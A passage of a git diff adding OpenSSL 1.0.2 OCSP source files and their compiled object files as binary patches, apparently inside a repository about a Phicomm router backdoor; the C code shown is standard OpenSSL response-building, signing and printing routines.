+        if (BIO_write(bp, "\n", 1) <= 0)
+            goto err;
+    }
+    if (!X509V3_extensions_print(bp, "Response Extensions",
+                                 rd->responseExtensions, flags, 4))
+        goto err;
+    if (X509_signature_print(bp, br->signatureAlgorithm, br->signature) <= 0)
+        goto err;
+
+    for (i = 0; i < sk_X509_num(br->certs); i++) {
+        X509_print(bp, sk_X509_value(br->certs, i));
+        PEM_write_bio_X509(bp, sk_X509_value(br->certs, i));
+    }
+
+    ret = 1;
+ err:
+    OCSP_BASICRESP_free(br);
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_prn.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_prn.o
new file mode 100644
index 0000000000000000000000000000000000000000..ddbbcc4a6eebfd8badfa923af83baad31dbf4919
GIT binary patch
literal 10136
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_srv.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_srv.c
new file mode 100644
index 0000000..2ec2c63
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_srv.c
@@ -0,0 +1,271 @@
+/* ocsp_srv.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2001.
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <cryptlib.h>
+#include <openssl/objects.h>
+#include <openssl/rand.h>
+#include <openssl/x509.h>
+#include <openssl/pem.h>
+#include <openssl/x509v3.h>
+#include <openssl/ocsp.h>
+
+/*
+ * Utility functions related to sending OCSP responses and extracting
+ * relevant information from the request.
+ */
+
+int OCSP_request_onereq_count(OCSP_REQUEST *req)
+{
+    return sk_OCSP_ONEREQ_num(req->tbsRequest->requestList);
+}
+
+OCSP_ONEREQ *OCSP_request_onereq_get0(OCSP_REQUEST *req, int i)
+{
+    return sk_OCSP_ONEREQ_value(req->tbsRequest->requestList, i);
+}
+
+OCSP_CERTID *OCSP_onereq_get0_id(OCSP_ONEREQ *one)
+{
+    return one->reqCert;
+}
+
+int OCSP_id_get0_info(ASN1_OCTET_STRING **piNameHash, ASN1_OBJECT **pmd,
+                      ASN1_OCTET_STRING **pikeyHash,
+                      ASN1_INTEGER **pserial, OCSP_CERTID *cid)
+{
+    if (!cid)
+        return 0;
+    if (pmd)
+        *pmd = cid->hashAlgorithm->algorithm;
+    if (piNameHash)
+        *piNameHash = cid->issuerNameHash;
+    if (pikeyHash)
+        *pikeyHash = cid->issuerKeyHash;
+    if (pserial)
+        *pserial = cid->serialNumber;
+    return 1;
+}
+
+int OCSP_request_is_signed(OCSP_REQUEST *req)
+{
+    if (req->optionalSignature)
+        return 1;
+    return 0;
+}
+
+/* Create an OCSP response and encode an optional basic response */
+OCSP_RESPONSE *OCSP_response_create(int status, OCSP_BASICRESP *bs)
+{
+    OCSP_RESPONSE *rsp = NULL;
+
+    if (!(rsp = OCSP_RESPONSE_new()))
+        goto err;
+    if (!(ASN1_ENUMERATED_set(rsp->responseStatus, status)))
+        goto err;
+    if (!bs)
+        return rsp;
+    if (!(rsp->responseBytes = OCSP_RESPBYTES_new()))
+        goto err;
+    rsp->responseBytes->responseType = OBJ_nid2obj(NID_id_pkix_OCSP_basic);
+    if (!ASN1_item_pack
+        (bs, ASN1_ITEM_rptr(OCSP_BASICRESP), &rsp->responseBytes->response))
+         goto err;
+    return rsp;
+ err:
+    if (rsp)
+        OCSP_RESPONSE_free(rsp);
+    return NULL;
+}
+
+OCSP_SINGLERESP *OCSP_basic_add1_status(OCSP_BASICRESP *rsp,
+                                        OCSP_CERTID *cid,
+                                        int status, int reason,
+                                        ASN1_TIME *revtime,
+                                        ASN1_TIME *thisupd,
+                                        ASN1_TIME *nextupd)
+{
+    OCSP_SINGLERESP *single = NULL;
+    OCSP_CERTSTATUS *cs;
+    OCSP_REVOKEDINFO *ri;
+
+    if (!rsp->tbsResponseData->responses &&
+        !(rsp->tbsResponseData->responses = sk_OCSP_SINGLERESP_new_null()))
+        goto err;
+
+    if (!(single = OCSP_SINGLERESP_new()))
+        goto err;
+
+    if (!ASN1_TIME_to_generalizedtime(thisupd, &single->thisUpdate))
+        goto err;
+    if (nextupd &&
+        !ASN1_TIME_to_generalizedtime(nextupd, &single->nextUpdate))
+        goto err;
+
+    OCSP_CERTID_free(single->certId);
+
+    if (!(single->certId = OCSP_CERTID_dup(cid)))
+        goto err;
+
+    cs = single->certStatus;
+    switch (cs->type = status) {
+    case V_OCSP_CERTSTATUS_REVOKED:
+        if (!revtime) {
+            OCSPerr(OCSP_F_OCSP_BASIC_ADD1_STATUS, OCSP_R_NO_REVOKED_TIME);
+            goto err;
+        }
+        if (!(cs->value.revoked = ri = OCSP_REVOKEDINFO_new()))
+            goto err;
+        if (!ASN1_TIME_to_generalizedtime(revtime, &ri->revocationTime))
+            goto err;
+        if (reason != OCSP_REVOKED_STATUS_NOSTATUS) {
+            if (!(ri->revocationReason = ASN1_ENUMERATED_new()))
+                goto err;
+            if (!(ASN1_ENUMERATED_set(ri->revocationReason, reason)))
+                goto err;
+        }
+        break;
+
+    case V_OCSP_CERTSTATUS_GOOD:
+        cs->value.good = ASN1_NULL_new();
+        break;
+
+    case V_OCSP_CERTSTATUS_UNKNOWN:
+        cs->value.unknown = ASN1_NULL_new();
+        break;
+
+    default:
+        goto err;
+
+    }
+    if (!(sk_OCSP_SINGLERESP_push(rsp->tbsResponseData->responses, single)))
+        goto err;
+    return single;
+ err:
+    OCSP_SINGLERESP_free(single);
+    return NULL;
+}
+
+/* Add a certificate to an OCSP request */
+
+int OCSP_basic_add1_cert(OCSP_BASICRESP *resp, X509 *cert)
+{
+    if (!resp->certs && !(resp->certs = sk_X509_new_null()))
+        return 0;
+
+    if (!sk_X509_push(resp->certs, cert))
+        return 0;
+    CRYPTO_add(&cert->references, 1, CRYPTO_LOCK_X509);
+    return 1;
+}
+
+int OCSP_basic_sign(OCSP_BASICRESP *brsp,
+                    X509 *signer, EVP_PKEY *key, const EVP_MD *dgst,
+                    STACK_OF(X509) *certs, unsigned long flags)
+{
+    int i;
+    OCSP_RESPID *rid;
+
+    if (!X509_check_private_key(signer, key)) {
+        OCSPerr(OCSP_F_OCSP_BASIC_SIGN,
+                OCSP_R_PRIVATE_KEY_DOES_NOT_MATCH_CERTIFICATE);
+        goto err;
+    }
+
+    if (!(flags & OCSP_NOCERTS)) {
+        if (!OCSP_basic_add1_cert(brsp, signer))
+            goto err;
+        for (i = 0; i < sk_X509_num(certs); i++) {
+            X509 *tmpcert = sk_X509_value(certs, i);
+            if (!OCSP_basic_add1_cert(brsp, tmpcert))
+                goto err;
+        }
+    }
+
+    rid = brsp->tbsResponseData->responderId;
+    if (flags & OCSP_RESPID_KEY) {
+        unsigned char md[SHA_DIGEST_LENGTH];
+        X509_pubkey_digest(signer, EVP_sha1(), md, NULL);
+        if (!(rid->value.byKey = ASN1_OCTET_STRING_new()))
+            goto err;
+        if (!(ASN1_OCTET_STRING_set(rid->value.byKey, md, SHA_DIGEST_LENGTH)))
+            goto err;
+        rid->type = V_OCSP_RESPID_KEY;
+    } else {
+        if (!X509_NAME_set(&rid->value.byName, X509_get_subject_name(signer)))
+            goto err;
+        rid->type = V_OCSP_RESPID_NAME;
+    }
+
+    if (!(flags & OCSP_NOTIME) &&
+        !X509_gmtime_adj(brsp->tbsResponseData->producedAt, 0))
+        goto err;
+
+    /*
+     * Right now, I think that not doing double hashing is the right thing.
+     * -- Richard Levitte
+     */
+
+    if (!OCSP_BASICRESP_sign(brsp, key, dgst, 0))
+        goto err;
+
+    return 1;
+ err:
+    return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_srv.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_srv.o
new file mode 100644
index 0000000000000000000000000000000000000000..87556196050b3f0e2b84676de558d01b8a8dbe7c
GIT binary patch
literal 5968
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
H>c{^F2Y8rK

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_vfy.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_vfy.c
new file mode 100644
index 0000000..6c0ccb5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_vfy.c
@@ -0,0 +1,441 @@
+/* ocsp_vfy.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000-2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <openssl/ocsp.h>
+#include <openssl/err.h>
+#include <string.h>
+
+static int ocsp_find_signer(X509 **psigner, OCSP_BASICRESP *bs,
+                            STACK_OF(X509) *certs, X509_STORE *st,
+                            unsigned long flags);
+static X509 *ocsp_find_signer_sk(STACK_OF(X509) *certs, OCSP_RESPID *id);
+static int ocsp_check_issuer(OCSP_BASICRESP *bs, STACK_OF(X509) *chain,
+                             unsigned long flags);
+static int ocsp_check_ids(STACK_OF(OCSP_SINGLERESP) *sresp,
+                          OCSP_CERTID **ret);
+static int ocsp_match_issuerid(X509 *cert, OCSP_CERTID *cid,
+                               STACK_OF(OCSP_SINGLERESP) *sresp);
+static int ocsp_check_delegated(X509 *x, int flags);
+static int ocsp_req_find_signer(X509 **psigner, OCSP_REQUEST *req,
+                                X509_NAME *nm, STACK_OF(X509) *certs,
+                                X509_STORE *st, unsigned long flags);
+
+/* Verify a basic response message */
+
